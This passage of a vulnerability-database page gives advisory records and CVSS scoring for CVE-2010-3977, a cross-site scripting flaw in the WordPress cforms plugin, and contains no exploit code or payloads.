"obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3977"], "modified": "2012-02-15T00:00:00", "id": "JVN:35256978", "href": "http://jvn.jp/en/jp/JVN35256978/index.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-11-05T00:08:56", "description": "A cross-site scripting (XSS) vulnerability has been reported in the cforms plugin for WordPress. cforms is a highly customizable, flexible and powerful form builder plugin, covering a variety of use cases and features from attachments to multi-form management. A remote attacker may exploit this vulnerability to run malicious scripts on an affected system.", "cvss3": {}, "published": "2010-11-14T00:00:00", "type": "checkpoint_advisories", "title": "Preemptive Protection against WordPress cforms Plugin Cross-Site Scripting (XSS) Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3977"], "modified": "2010-01-01T00:00:00", "id": "CPAI-2010-315", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2021-06-08T19:01:00", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2010-11-02T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3977", "CVE-2010-4006"], "modified": "2010-11-02T00:00:00", "id": "SECURITYVULNS:VULN:11223", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11223", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}

cforms WordPress Plugin Cross Site Scripting Vulnerability - CVE-2010-3977

Description

Related